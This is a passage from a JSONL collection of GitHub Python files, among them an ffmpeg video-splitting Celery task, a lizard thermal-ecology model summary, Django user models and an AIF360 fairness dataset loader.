fig.set_size_inches(get_savefig_size(MAX_N_AUTHOR_NODES), forward=False)\n fig.savefig(cfg.paths['authors-graph-plot'], dpi=333)\n print('saved authors graph plot to \"{}\"'.format(\n cfg.paths['authors-graph-plot']))\n if mapping is not None:\n util.save_json(cfg.paths['authors-graph-plot-mapping'], mapping)\n print('saved authors graph plot mapping to \"{}\"'.format(\n cfg.paths['authors-graph-plot-mapping']))\n\n\ndef plot_graphs():\n plot_titles_graph()\n plot_authors_graph()\n\n\ndef main():\n plot_graphs()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"larocs/attention_dl","sub_path":"plot_graphs.py","file_name":"plot_graphs.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"276194214","text":"import hashlib\nfrom pathlib import Path\n\nfrom celery import shared_task\nfrom celery_progress.backend import ProgressRecorder\nfrom minio.commonconfig import Tags\n\nfrom ffmpeg_transcoder.models import Folder\nfrom ffmpeg import FFmpeg, Progress, FFmpegError\nfrom django.conf import settings\n\n\n@shared_task(bind=True)\ndef split_video(self, input_folder_id, output_folder_id, r_filename: str):\n input_folder = Folder.objects.get(pk=input_folder_id)\n output_folder = Folder.objects.get(pk=output_folder_id)\n input_folder_client = input_folder.bucket.connection.get_client()\n output_folder_client = output_folder.bucket.connection.get_client()\n progress_recorder = ProgressRecorder(self)\n progress_recorder.set_progress(0, 100, description=\"Splitting video for file: \" + r_filename)\n # Download file\n hashed_filename = hashlib.md5((r_filename + str(input_folder.id) + \"splitVideo\").encode()).hexdigest() + Path(\n r_filename).suffix\n object_download_path = settings.DOWNLOAD_FOLDER / hashed_filename\n input_folder_client.fget_object(input_folder.bucket.name,\n input_folder.prefix + \"/\" + r_filename, object_download_path)\n\n # Create output folder\n output_folder_path = Path(settings.UPLOAD_FOLDER) / hashed_filename\n output_folder_path.parent.mkdir(parents=True, exist_ok=True)\n\n template = str((output_folder_path / \"%03d\").with_suffix(Path(r_filename).suffix))\n # Split video\n ffmpeg = (\n FFmpeg()\n .option('y')\n .input(str(object_download_path))\n .output(template, {\n 'c': 'copy',\n 'map': '0',\n 'segment_time': '00:10:00',\n 'f': 'segment',\n 'reset_timestamps': '1'\n })\n )\n\n task_id = self.request.id\n\n @ffmpeg.on(\"progress\")\n def on_progress(progress: Progress):\n print(\n f\"Task ID: {task_id} - Frame: {progress.frame} - Fps: {progress.fps}\")\n\n @ffmpeg.on(\"completed\")\n def on_completed():\n print(\"Job Completed !!! 🎉\")\n\n try:\n print(\"Starting transcoding\")\n ffmpeg.execute()\n\n except FFmpegError as e:\n output_folder_path.unlink()\n # Set scheduled tag\n tags = Tags()\n tags[\"scheduled\"] = \"false\"\n input_folder_client.set_object_tags(\n input_folder.bucket.name,\n input_folder.prefix + \"/\" + r_filename,\n tags,\n )\n raise e\n\n # Upload folder\n for file in output_folder_path.glob(\"*\"):\n output_folder_client.fput_object(output_folder.bucket.name, output_folder.prefix + \"/\" + file.name, file)\n # tag file\n tags = Tags()\n tags[\"scheduled\"] = \"false\"\n tags[\"parent\"] = r_filename\n tags[\"type\"] = \"split\"\n output_folder_client.set_object_tags(\n output_folder.bucket.name,\n output_folder.prefix + \"/\" + file.name,\n tags,\n )\n file.unlink()\n\n output_folder_path.rmdir()\n # delete file\n object_download_path.unlink()\n\n # Set scheduled tag\n tags = Tags()\n tags[\"scheduled\"] = \"false\"\n input_folder_client.set_object_tags(\n input_folder.bucket.name,\n input_folder.prefix + \"/\" + r_filename,\n tags,\n )\n print(\"Splitting completed\")\n progress_recorder.set_progress(100, 100, description=\"Splitting completed\")\n\n return f\"Splitting completed for file: {r_filename} 🎉\"\n","repo_name":"Apoorva64/ffmpeg-scheduler","sub_path":"ffmpeg_transcoder/split_video.py","file_name":"split_video.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42195976073","text":"\"\"\"\n1. Faça um programa que receba dois números e mostre qual deles é o maior.\n\n\"\"\"\nnum1 = int(input('Digite o primeiro número: '))\nnum2 = int(input('Digite o segundo numero: '))\n\nif num1 > num2:\n print(f'O primeiro número é maior: {num1}')\nelse:\n print(f'O segundo número é maior: {num2}')","repo_name":"pand-oly/curso_python","sub_path":"secao-05/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36988967135","text":"#!/usr/bin/python3\n#-*- coding:utf8 -*-\n\n\"Utility functions.\"\n\nfrom itertools import starmap\nfrom multiprocessing import current_process, cpu_count\nfrom multiprocessing.pool import Pool\n\n\n__all__ = 'randbelow', 'parallel', 'parallel_map', 'parallel_starmap', 'random_sample', 'random_permutation', 'Immutable', 'memoize', 'canonical', 'optimized', 'evaluate', 'substitute', 'valuations'\n\n\nif __debug__:\n\tfrom random import randrange\n\t\n\tdef randbelow(modulus):\n\t\t\"In debug mode, use pseudo-random number generator.\"\n\t\treturn randrange(modulus)\nelse:\n\tfrom secrets import randbelow\n\t\"In release mode, use system entropy source.\"\n\n\ndef canonical(x):\n\treturn x.canonical()\n\n\ndef optimized(x):\n\treturn x.optimized()\n\n\ndef evaluate(x):\n\treturn x.evaluate()\n\n\ndef substitute(x, algebra, subst):\n\t#print(\"substitute\")\n\tif hasattr(x, 'operator'):\n\t\treturn x(**subst)\n\telse:\n\t\treturn algebra.const(x)\n\n\ndef valuations(*variable):\n\tfor valuation in product(*[_v.algebra.base_ring.domain() for _v in variable]):\n\t\tyield dict(zip((str(_v) for _v in variable), valuation))\n\n\ndef memoize(function):\n\tcache = dict()\n\t\n\tdef memoized(*args, **kwargs):\n\t\tkwkey = tuple((_k, kwargs[_k]) for _k in sorted(kwargs.keys()))\n\t\ttry:\n\t\t\treturn cache[args, kwkey]\n\t\texcept KeyError:\n\t\t\tresult = function(*args, **kwargs)\n\t\t\tcache[args, kwkey] = result\n\t\t\treturn result\n\t\n\tmemoized.__name__ = function.__name__\n\treturn memoized\n\n\nparallelism = 0\n\n\nclass parallel:\n\tdef __init__(self, p=cpu_count()):\n\t\tself.new_parallelism = p\n\t\n\tdef __enter__(self):\n\t\tglobal parallelism\n\t\tself.old_parallelism = parallelism\n\t\tparallelism = self.new_parallelism\n\t\treturn self\n\t\n\tdef __exit__(self, *args):\n\t\tglobal parallelism\n\t\tparallelism = self.old_parallelism\n\n\ndef parallel_map(fun, iterable):\n\tif parallelism and not current_process().daemon:\n\t\twith Pool(parallelism) as p:\n\t\t\treturn p.map(fun, iterable)\n\telse:\n\t\treturn map(fun, iterable)\n\n\ndef parallel_starmap(fun, iterable):\n\tif parallelism and not current_process().daemon:\n\t\twith Pool(parallelism) as p:\n\t\t\treturn p.starmap(fun, iterable)\n\telse:\n\t\treturn starmap(fun, iterable)\n\n\ndef random_permutation(length):\n\titems = list(range(length))\n\twhile items:\n\t\tyield items.pop(randbelow(len(items)))\n\n\ndef random_sample(iterable, length, size):\n\t\"\"\"\n\tReturn a random sub-iterable of size `size` from the `iterable` of the length `length`.\n\t`size` must not be greater than `length`. It is an error if the `iterable` is shorter than `length`.\n\t\"\"\"\n\t\n\tif not size:\n\t\treturn\n\t\n\ts = 0\n\tfor n in range(size):\n\t\tmean = (length - s) // (size - n)\n\t\tfor m in range(randbelow(mean)):\n\t\t\tnext(iterable)\n\t\t\ts += 1\n\t\tyield next(iterable)\n\t\ts += 1\n\t# FIXME: sometimes ends prematurely\n\n\nclass Immutable:\n\t\"Makes the object immutable. You must set `self.immutable = True` after initialization in the constructor.\"\n\t\n\tmutable = frozenset()\n\t\n\t@property\n\tdef immutable(self):\n\t\ttry:\n\t\t\treturn self.__immutable\n\t\texcept AttributeError:\n\t\t\treturn False\n\t\n\t@immutable.setter\n\tdef immutable(self, value):\n\t\tobject.__setattr__(self, '_Immutable__immutable', value)\n\t\n\t#@property\n\t#def mutable(self):\n\t#\ttry:\n\t#\t\treturn self.__mutable\n\t#\texcept AttributeError:\n\t#\t\tmutable = set()\n\t#\t\tobject.__setattr__(self, '_Immutable__mutable', mutable)\n\t#\t\treturn mutable\n\t#\n\t#@mutable.setter\n\t#def mutable(self, value):\n\t#\tobject.__setattr__(self, '_Immutable__mutable', value)\n\t\n\tdef __setattr__(self, attr, value):\n\t\tif self.immutable and (attr not in self.mutable):\n\t\t\traise TypeError(f\"Trying to set attribute `{attr}` on an immutable object. Allowed set of mutable attributes: {' '.join(self.mutable)}\")\n\t\telse:\n\t\t\tobject.__setattr__(self, attr, value)\n\t\n\tdef __delattr__(self, attr):\n\t\tif self.immutable and (attr not in self.mutable):\n\t\t\traise TypeError(\"Immutable object.\")\n\t\telse:\n\t\t\tobject.__delattr__(self, attr)\n\t\n\tdef __hash__(self):\n\t\tif not self.immutable:\n\t\t\traise TypeError(\"Mutable object. ({})\".format(type(self)))\n\t\treturn NotImplemented\n\n","repo_name":"haael/white-box-fapkc","sub_path":"old/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} +{"seq_id":"74211750862","text":"__author__ = \"Jianguo Jin (jinjianguosky@hotmail.com)\"\n\n# !/usr/bin/python3\n# -*- coding:utf-8 -*- \n# Created by Jianguo on 2017/7/29\n\"\"\"\n Description:\n .1.3 数据驱动\n 读取csv 文件首先要导入csv 模块, 通过reader() 读取CSV文件,然后通过for 循环\n便利文件中的每一行数据。\n\nuser_info.csv\ntesting,123455@126.com,23,man\ntesting2,123455@127.com,24,woman\ntesting3,123455@128.com,25,woman\n\n\"\"\"\n\nimport csv\n\ncsv_file = open('user_info.csv', 'r', encoding='utf-8')\ndata = csv.reader(csv_file)\n\nfor line in data:\n print(\"Mail: {}\".format(line[1]))\n","repo_name":"skyaiolos/selenium2_python","sub_path":"chapter4_autoTestingModel/sec4.1.3_DataDrive_CSVFile.py","file_name":"sec4.1.3_DataDrive_CSVFile.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15116082247","text":"import matplotlib.pyplot as pyplot\nimport json\nimport sys\nimport re\n\nclass SensorPlotable:\n def __init__(self):\n self.values = []\n self.seconds = []\n\n def update(self, seconds: float, values: list):\n self.values.append(values)\n self.seconds.append(seconds)\n \n\nclass SensorPlotableManager:\n def __init__(self, title: str):\n self.sensors = {}\n self.title = title\n \n def update(self, name: str, seconds: float, values: list):\n if name not in self.sensors:\n self.sensors[name] = SensorPlotable()\n self.sensors[name].update(seconds, values)\n\n def plotAll(self):\n figure, axes = pyplot.subplots(nrows = len(self.sensors), squeeze = False, sharex = True)\n \n axes[0, 0].set_title(self.title)\n axes[len(self.sensors)-1, 0].set_xlabel(\"time (ms)\")\n \n for i, (name, plotable) in enumerate(self.sensors.items()):\n axes[i, 0].set_ylabel(name)\n axes[i, 0].plot([i-plotable.seconds[0] for i in plotable.seconds], plotable.values)\n \n figure.tight_layout()\n pyplot.show()\n\n \nmanager = SensorPlotableManager(title = re.sub(\"^.*/\", \"\", sys.argv[1]))\nwith open(sys.argv[1]) as jsonFile:\n for line in jsonFile:\n sample = json.loads(line)\n manager.update(sample[\"name\"], sample[\"millis\"], sample[\"values\"])\n\nmanager.plotAll()\n","repo_name":"LewisCollum/SensorPort","sub_path":"script/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73223206542","text":"#imports tkinter module to python so we can use it\nfrom tkinter import *\n#Tk makes window\nmaster = Tk()\n\ndef return_entry(en):\n\tcontent = entry.get()\n\tprint(content)\n\t\nLabel(master, text=\"Input: \").grid(row=0, sticky=W)\n\nentry = Entry(master)\nentry.grid(row=0, column=1)\n\nentry.bind('', return_entry)\n\n#keeps window open\nmainloop()","repo_name":"ethantsang04/Year9Design_EthanTsang","sub_path":"myentry.py","file_name":"myentry.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24213035558","text":"import os\n\nimport numpy as np\nimport pandas as pd\nimport warnings\nfrom numpy.core._multiarray_umath import ndarray\n\nimport Parameters as p\nfrom Lizard_climbing import Lizard_climbing\nfrom Lizard_climbing_13 import Lizard_climbing_13\nfrom Lizard_energy import Lizard_energy\n\nclass Summary:\n def __init__(self , climate, lizard):\n self.statistics_data = []\n self.climate = climate\n self.lizard = lizard\n\n def calculate_statistics(self):\n\n # id\n id = self.climate.inputfilename[0 : self.climate.inputfilename.index(\"_\")]\n self.statistics_data.append(float(id))\n\n # coordinates\n self.statistics_data.append(self.climate.lat)\n self.statistics_data.append(self.climate.lon)\n\n # past / future\n if \"past\" in self.climate.inputfilename:\n time = 0.0\n elif \"future\" in self.climate.inputfilename:\n time = 1.0\n\n self.statistics_data.append(time)\n\n # climbing?\n if isinstance(self.lizard, Lizard_climbing):\n is_climbing = 1.0\n else:\n is_climbing = 0.0\n\n self.statistics_data.append(is_climbing)\n\n # coordinate temperatures\n self.statistics_data.append(self.climate.mean_ta_year)\n self.statistics_data.append(self.climate.sd_ta_year)\n self.statistics_data.append(self.climate.mean_ta_summer)\n self.statistics_data.append(self.climate.sd_ta_summer)\n self.statistics_data.append(self.climate.mean_ta_winter)\n self.statistics_data.append(self.climate.sd_ta_winter)\n\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n\n # total energy\n self.statistics_data.append(sum(self.lizard.energy_gain_per_year) / 20)\n\n # annual growth rate\n self.statistics_data.append(sum(self.lizard.growth_rate_per_year) / 20)\n\n # micro-climate counters\n months = np.array(self.climate.climate_data[p.month,:])\n months_per_day = np.array(self.climate.month_per_day)\n days_per_month = [31,28,31,30,31,30,31,31,30,31,30,31]\n SWDOWNs = np.array(self.climate.climate_data[p.SWDOWN,:])\n mask_daylight = np.array([False])\n mask_daylight = np.concatenate((mask_daylight, (SWDOWNs > 1)[:-1]))\n\n # mean activity hours per day in different months\n activity_ph = np.array(self.lizard.active_per_hour)\n activity_pm = [0] * 12\n\n for month in range(1, 13):\n mask_month_per_hour = (months == month)\n mask_month_per_day = (months_per_day == month)\n\n mean_activity_hours_per_day = (sum(activity_ph[mask_month_per_hour]) / 60) / sum(mask_month_per_day)\n activity_pm[month - 1] = mean_activity_hours_per_day * days_per_month[month - 1]\n\n self.statistics_data.append(sum(activity_pm))\n\n # activity\n activity_pd = self.lizard.activity_per_day\n # days with activity\n self.statistics_data.append(sum(activity_pd) / 20)\n\n # first julian day of activity\n activity_pd_a = np.array(activity_pd)\n activity_pd_a = np.reshape(activity_pd_a,(20,365))\n \n first_activity_days = []\n last_activity_days = []\n length_of_activity_season = []\n years_with_no_activity = []\n\n j = 1\n for year in activity_pd_a:\n if np.any(year) == False:\n years_with_no_activity.append(j)\n length_of_activity_season.append(0)\n\n else:\n indices = np.nonzero(year)\n\n first_activity_days.append(indices[0][0] + 1)\n last_activity_days.append(indices[0][-1] + 1)\n season_length = last_activity_days[-1] - first_activity_days[-1]\n length_of_activity_season.append(season_length)\n\n j += 1\n \n years_with_activity = 20 - len(years_with_no_activity)\n\n if years_with_activity != 0:\n self.statistics_data.append(sum(first_activity_days) / years_with_activity)\n self.statistics_data.append(sum(last_activity_days) / years_with_activity)\n self.statistics_data.append(sum(length_of_activity_season) / 20)\n else:\n self.statistics_data.append(None)\n self.statistics_data.append(None)\n self.statistics_data.append(0.0)\n\n # heights\n if isinstance(self.lizard, Lizard_climbing):\n if len(self.lizard.climbing_heights_when_essential) != 0:\n mean_height = np.mean(self.lizard.climbing_heights_when_essential)\n std_height = np.std(self.lizard.climbing_heights_when_essential)\n else:\n mean_height = None\n std_height = None\n \n self.statistics_data.append(mean_height)\n self.statistics_data.append(std_height)\n \n \n if len(self.lizard.climbing_heights_when_essential_open_tree) != 0:\n mean_height_open = np.mean(self.lizard.climbing_heights_when_essential_open_tree)\n else:\n mean_height_open = None\n\n self.statistics_data.append(mean_height_open)\n \n #print(self.lizard.climbing_heights_when_essential_shaded_tree)\n \n if len(self.lizard.climbing_heights_when_essential_shaded_tree) != 0:\n mean_height_shaded = np.mean(self.lizard.climbing_heights_when_essential_shaded_tree)\n else:\n mean_height_shaded = None\n\n self.statistics_data.append(mean_height_shaded)\n\n \n\n # why climbing?\n if sum(self.lizard.essential_climbing_per_hour) != 0:\n to_warm = (sum(self.lizard.climbing_to_warm_per_hour) / sum(self.lizard.essential_climbing_per_hour)) * 100\n to_cool = (sum(self.lizard.climbing_to_cool_per_hour) / sum(self.lizard.essential_climbing_per_hour)) * 100\n mixed = (sum(self.lizard.climbing_mixed) / sum(self.lizard.essential_climbing_per_hour)) * 100\n \n open_tree = (sum(self.lizard.essential_climbing_on_open_tree) / sum(self.lizard.essential_climbing_per_hour)) * 100\n shaded_tree = (sum(self.lizard.essential_climbing_on_shaded_tree) / sum(self.lizard.essential_climbing_per_hour)) * 100\n else:\n to_warm = -1.0\n to_cool = -1.0\n mixed = -1.0\n\n open_tree = -1.0\n shaded_tree = -1.0\n\n self.statistics_data.append(to_warm)\n self.statistics_data.append(to_cool)\n self.statistics_data.append(mixed)\n\n self.statistics_data.append(open_tree)\n self.statistics_data.append(shaded_tree)\n \n # how much essential from all climbing (for open and shaded tree)?\n\n if sum(self.lizard.open_tree_per_hour) != 0:\n prec_of_essential_open_tree = (sum(self.lizard.essential_climbing_on_open_tree) / sum(self.lizard.open_tree_per_hour)) * 100\n else:\n prec_of_essential_open_tree = -1.0\n \n if sum(self.lizard.shaded_tree_per_hour) != 0:\n prec_of_essential_shaded_tree = (sum(self.lizard.essential_climbing_on_shaded_tree) / sum(self.lizard.shaded_tree_per_hour)) * 100\n else:\n prec_of_essential_shaded_tree = -1.0\n\n self.statistics_data.append(prec_of_essential_open_tree)\n self.statistics_data.append(prec_of_essential_shaded_tree)\n\n else:\n for i in range(11):\n self.statistics_data.append(None)\n\n self.statistics_data = np.array(self.statistics_data).astype(np.float64)\n\n \n \n ## additional information - about climbing\n\n \"\"\"\n if isinstance(self.lizard, Lizard_climbing):\n\n number_of_rows = 365 * 24\n columns = ['julian_day', 'hour', 'daylight', 'burrow', 'open', 'shade', 'open_tree', 'shaded_tree', 'ess_open_tree', 'ess_shaded_tree']\n big_lst = []\n big_lst.append(columns)\n \n daylight_mat_add = np.array(self.lizard.daylight_per_hour)\n burrow_mat_add = np.array(self.lizard.burrow_per_hour)\n burrow_night_mat_add = np.array(self.lizard.burrow_per_hour_night)\n open_mat_add = np.array(self.lizard.open_per_hour)\n shade_mat_add = np.array(self.lizard.shade_per_hour)\n shade_night_mat_add = np.array(self.lizard.shade_per_hour_night)\n open_tree_mat_add = np.array(self.lizard.open_tree_per_hour)\n shaded_tree_mat_add = np.array(self.lizard.shaded_tree_per_hour)\n ess_open_tree_mat_add = np.array(self.lizard.essential_climbing_on_open_tree)\n ess_shaded_tree_mat_add = np.array(self.lizard.essential_climbing_on_shaded_tree)\n\n #daylight_for_print = pd.DataFrame(np.reshape(daylight_mat_add, (20, 8760)).tolist())\n #daylight_for_print.to_csv(\"daylight.csv\")\n \n\n daylight_mat_add = np.reshape(daylight_mat_add, (20, 365, 24))\n burrow_mat_add = np.reshape(burrow_mat_add, (20, 365, 24))\n burrow_night_mat_add = np.reshape(burrow_night_mat_add, (20, 365, 24))\n open_mat_add = np.reshape(open_mat_add, (20, 365, 24))\n shade_mat_add = np.reshape(shade_mat_add, (20, 365, 24))\n shade_night_mat_add = np.reshape(shade_night_mat_add, (20, 365, 24))\n open_tree_mat_add = np.reshape(open_tree_mat_add, (20, 365, 24))\n shaded_tree_mat_add = np.reshape(shaded_tree_mat_add, (20, 365, 24))\n ess_open_tree_mat_add = np.reshape(ess_open_tree_mat_add, (20, 365, 24))\n ess_shaded_tree_mat_add = np.reshape(ess_shaded_tree_mat_add, (20, 365, 24))\n \n #daylight_means_add = np.all(daylight_mat_add, axis = 0)\n daylight_means_add = np.sum(daylight_mat_add, axis=0) >= 10\n daylight_sums_add = np.sum(daylight_mat_add, axis = 0)\n special_hours = np.logical_and((np.sum(daylight_mat_add, axis = 0) != 0), (np.sum(daylight_mat_add, axis = 0) != 20))\n #daylight_special_hours = (np.sum(daylight_mat_add, axis = 0) != 0) or (np.sum(daylight_mat_add, axis = 0) != 0)\n #print(daylight_special_hours)\n #daylight_for_print = pd.DataFrame(daylight_special_hours.tolist())\n #daylight_for_print.to_csv(\"daylight.csv\")\n \n burrow_means_add = np.mean(burrow_mat_add, axis = 0)\n burrow_night_means_add = np.mean(burrow_night_mat_add, axis=0)\n open_means_add = np.mean(open_mat_add, axis=0)\n shade_means_add = np.mean(shade_mat_add, axis=0)\n shade_night_means_add = np.mean(shade_night_mat_add, axis=0)\n open_tree_means_add = np.mean(open_tree_mat_add, axis=0)\n shaded_tree_means_add = np.mean(shaded_tree_mat_add, axis=0)\n ess_open_tree_means_add = np.mean(ess_open_tree_mat_add, axis=0)\n ess_shaded_tree_means_add = np.mean(ess_shaded_tree_mat_add, axis=0)\n \n #daylight_for_print = pd.DataFrame(daylight_means_add.tolist())\n #daylight_for_print.to_csv(\"daylight.csv\")\n \n for jd in range(365):\n for h in range(24):\n \n special_hour_val = special_hours[jd, h]\n daylight_val_add = daylight_means_add[jd, h]\n burrow_day_val_add = burrow_means_add[jd, h]\n burrow_night_val_add = burrow_night_means_add[jd, h]\n open_val_add = open_means_add[jd, h]\n shade_day_val_add = shade_means_add[jd, h]\n shade_night_val_add = shade_night_means_add[jd, h]\n open_tree_val_add = open_tree_means_add[jd, h]\n shaded_tree_val_add = shaded_tree_means_add[jd, h]\n ess_open_tree_val_add = ess_open_tree_means_add[jd, h]\n ess_shaded_tree_val_add = ess_shaded_tree_means_add[jd, h]\n \n if special_hour_val == True:\n \n day_years = daylight_sums_add[jd, h]\n night_years = 20 - day_years\n \n if daylight_val_add == True: # marked as day\n burrow_val_add = (burrow_day_val_add * 20) / day_years\n shade_val_add = (shade_day_val_add * 20) / day_years\n open_val_add = (open_val_add * 20) / day_years\n open_tree_val_add = (open_tree_val_add * 20) / day_years\n shaded_tree_val_add = (shaded_tree_val_add * 20) / day_years\n ess_open_tree_val_add = (ess_open_tree_val_add * 20) / day_years\n ess_shaded_tree_val_add = (ess_shaded_tree_val_add * 20) / day_years\n else:\n burrow_val_add = (burrow_night_val_add * 20) / night_years\n shade_val_add = (shade_night_val_add * 20) / night_years\n open_val_add = 0\n open_tree_val_add = 0\n shaded_tree_val_add = 0\n ess_open_tree_val_add = 0\n ess_shaded_tree_val_add = 0\n else:\n burrow_val_add = burrow_day_val_add + burrow_night_val_add\n shade_val_add = shade_day_val_add + shade_night_val_add\n \n \n row_lst = [jd + 1, h, daylight_val_add, burrow_val_add, open_val_add, shade_val_add, open_tree_val_add, shaded_tree_val_add, ess_open_tree_val_add, ess_shaded_tree_val_add]\n big_lst.append(row_lst)\n\n os.makedirs(\"climbing_info_files\", exist_ok=True)\n out_file_name = \"climbing_info_files/\" + self.climate.inputfilename[:-3] + \".csv\"\n out_file = open(out_file_name, 'w')\n for row in big_lst:\n for column in row:\n out_file.write(str(column) + \",\")\n out_file.write(\"\\n\")\n out_file.close()\n\n \"\"\"\n \n return self.statistics_data\n\n\n","repo_name":"levyofi/Zlotnick_et_al_NCC","sub_path":"Code/lizard_model/Summary/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6503113813","text":"from django.contrib.auth.models import AbstractUser\r\nfrom django.db import models\r\nfrom pytils.translit import slugify\r\n\r\n\r\nclass Group(models.Model):\r\n title = models.CharField(\r\n verbose_name='Название группы',\r\n help_text='Введите название группы',\r\n max_length=200,\r\n )\r\n slug = models.SlugField(\r\n verbose_name='Slug-метка',\r\n help_text='Укажите адрес для страницы группы',\r\n unique=True,\r\n )\r\n\r\n def save(self, *args, **kwargs):\r\n if not self.slug:\r\n self.slug = slugify(self.title)\r\n super().save(*args, **kwargs)\r\n\r\n def __str__(self):\r\n return self.title\r\n\r\n\r\nclass CustomUser(AbstractUser):\r\n email = models.EmailField(\r\n verbose_name='Электронная почта',\r\n help_text='Укажите электронную почту',\r\n null=True,\r\n )\r\n group = models.ForeignKey(\r\n Group,\r\n verbose_name='Группа',\r\n help_text='Выберите группу из списка',\r\n on_delete=models.SET_NULL,\r\n related_name='user',\r\n null=True,\r\n )\r\n allow_manage = models.BooleanField(\r\n default=False,\r\n verbose_name='Доступ к управлению',\r\n help_text='Открывает пользователю функционал проверки работ',\r\n null=True,\r\n )\r\n\r\n def __str__(self):\r\n return self.username\r\n","repo_name":"Kneshal/Normocontrol","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15520808969","text":"from sklearn.linear_model import LogisticRegression\r\nfrom sklearn import svm\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.preprocessing import StandardScaler, MaxAbsScaler\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn import tree\r\nfrom aif360.datasets import AdultDataset, GermanDataset, CompasDataset, BankDataset,MEPSDataset19\r\nfrom aif360.algorithms.preprocessing.optim_preproc_helpers.data_preproc_functions import load_preproc_data_adult, load_preproc_data_compas, load_preproc_data_german\r\nfrom aif360.algorithms.preprocessing.optim_preproc_helpers.distortion_functions\\\r\n import get_distortion_adult, get_distortion_german, get_distortion_compas\r\n# protected in {sex,race,age}\r\ndef get_data(dataset_used, protected,preprocessed = False):\r\n \"\"\" Obtains dataset from AIF360.\r\n\r\n Parameters:\r\n dataset_used (str) -- Name of the dataset\r\n protected (str) -- Protected attribute used\r\n Returns:\r\n dataset_orig (dataset) -- Classifier with default configuration from scipy\r\n privileged_groups (list) -- Attribute and corresponding value of privileged group \r\n unprivileged_groups (list) -- Attribute and corresponding value of unprivileged group \r\n optim_options (dict) -- Options if provided by AIF360\r\n \"\"\"\r\n if dataset_used == \"adult\":\r\n mutation_strategy = {\"0\":[1,0]}\r\n if protected == \"sex\":\r\n privileged_groups = [{'sex': 1}]\r\n unprivileged_groups = [{'sex': 0}]\r\n dataset_orig = load_preproc_data_adult(['sex'])\r\n else:\r\n privileged_groups = [{'race': 1}]\r\n unprivileged_groups = [{'race': 0}]\r\n dataset_orig = load_preproc_data_adult(['race'])\r\n \r\n optim_options = {\r\n \"distortion_fun\": get_distortion_adult,\r\n \"epsilon\": 0.05,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n }\r\n if not preprocessed:\r\n dataset_orig = AdultDataset()\r\n elif dataset_used == \"german\":\r\n mutation_strategy = {\"1\": [0, 1]}\r\n if protected == \"sex\":\r\n privileged_groups = [{'sex': 1}]\r\n unprivileged_groups = [{'sex': 0}]\r\n dataset_orig = load_preproc_data_german(['sex'])\r\n optim_options = {\r\n \"distortion_fun\": get_distortion_german,\r\n \"epsilon\": 0.05,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n }\r\n \r\n else:\r\n privileged_groups = [{'age': 1}]\r\n unprivileged_groups = [{'age': 0}]\r\n dataset_orig = load_preproc_data_german(['age'])\r\n optim_options = {\r\n \"distortion_fun\": get_distortion_german,\r\n \"epsilon\": 0.1,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n } \r\n if not preprocessed:\r\n dataset_orig = GermanDataset()\r\n elif dataset_used == \"compas\":\r\n mutation_strategy = {\"0\": [1, 0]}\r\n if protected == \"sex\":\r\n privileged_groups = [{'sex': 1}]\r\n unprivileged_groups = [{'sex': 0}]\r\n dataset_orig = load_preproc_data_compas(['sex'])\r\n else:\r\n privileged_groups = [{'race': 1}]\r\n unprivileged_groups = [{'race': 0}]\r\n dataset_orig = load_preproc_data_compas(['race'])\r\n \r\n optim_options = {\r\n \"distortion_fun\": get_distortion_compas,\r\n \"epsilon\": 0.05,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n }\r\n if not preprocessed:\r\n dataset_orig = CompasDataset()\r\n elif dataset_used == \"bank\":\r\n mutation_strategy = {\"0\": [1, 0]}\r\n privileged_groups = [{'age': 1}] \r\n unprivileged_groups = [{'age': 0}]\r\n dataset_orig = BankDataset()\r\n #dataset_orig.features[:,0] = dataset_orig.features[:,0]>=25\r\n optim_options = None\r\n elif dataset_used == \"mep\":\r\n mutation_strategy = {\"0\": [1, 0]}\r\n privileged_groups = [{'RACE': 1}]\r\n unprivileged_groups = [{'RACE': 0}]\r\n dataset_orig = MEPSDataset19()\r\n optim_options = None\r\n return dataset_orig, privileged_groups,unprivileged_groups,optim_options,mutation_strategy\r\n\r\ndef write_to_file(fname,content):\r\n \"\"\" Write content into a line of a file.\r\n\r\n Parameters:\r\n fname (str) -- Name of file to write to \r\n content (str) -- Line that is appendend to file\r\n \"\"\"\r\n f = open(fname, \"a\")\r\n f.write(content)\r\n f.write(\"\\n\")\r\n 